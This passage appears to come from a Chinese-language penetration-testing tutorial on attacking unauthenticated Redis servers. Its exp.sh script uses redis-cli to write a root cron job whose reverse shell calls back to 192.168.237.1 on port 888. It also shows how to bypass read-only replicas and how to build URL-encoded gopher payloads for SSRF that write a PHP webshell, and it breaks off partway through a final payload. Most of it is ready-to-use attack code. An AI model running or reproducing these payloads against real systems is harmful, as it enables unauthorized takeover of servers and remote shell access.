Linux操作系统写入计划任务的操作为例,编写exp.sh:
redis-cli -h $1 -p $2 config set dir /var/spool/cron/
redis-cli -h $1 -p $2 config set dbfilename root
redis-cli -h $1 -p $2 set 1 "\\n\\n\\n*/1 * * * * bash -i >& /dev/tcp/192.168.237.1/888 0>&1\\n\\n\\n"
redis-cli -h $1 -p $2 save
执行:
chmod +x exp.sh ./exp.sh redis_ip redis_port
报错(error) READONLY You can't write against a read only slave.解决 config set slave-read-only no
当遇到ssrf可以探测到内网redis服务时,可以利用gopher协议写入tcp stream的方式拿权限,这里介绍一个工具一键化生成payload:https://github.com/firebroo/sec_tools/tree/master/redis-over-gopher,使用方法如下:
redis.cmd文件为需要执行的redis命令,一行一条命令, e.g.
flushall
config set dir /tmp
config set dbfilename shell.php
set 'webshell' '<?php phpinfo();?>'
save
得到的payload
%2a%31%0d%0a%24%38%0d%0a%66%6c%75%73%68%61%6c%6c%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%33%0d%0a%64%69%72%0d%0a%24%34%0d%0a%2f%74%6d%70%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%31%30%0d%0a%64%62%66%69%6c%65%6e%61%6d%65%0d%0a%24%39%0d%0a%73%68%65%6c%6c%2e%70%68%70%0d%0a%2a%33%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%38%0d%0a%77%65%62%73%68%65%6c%6c%0d%0a%24%31%38%0d%0a%3c%3f%70%68%70%20%70%68%70%69%6e%66%6f%28%29%3b%3f%3e%0d%0a%2a%31%0d%0a%24%34%0d%0a%73%61%76%65%0d%0a
只需要在payload前面加上需要攻击机器的gopher://ip:port/_使用curl就行,最终payload
gopher://127.0.0.1:6379/_%2a%31%0d%0a%24%38%0d%0a%66%6c%75%73%68%61%6c%6c%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%
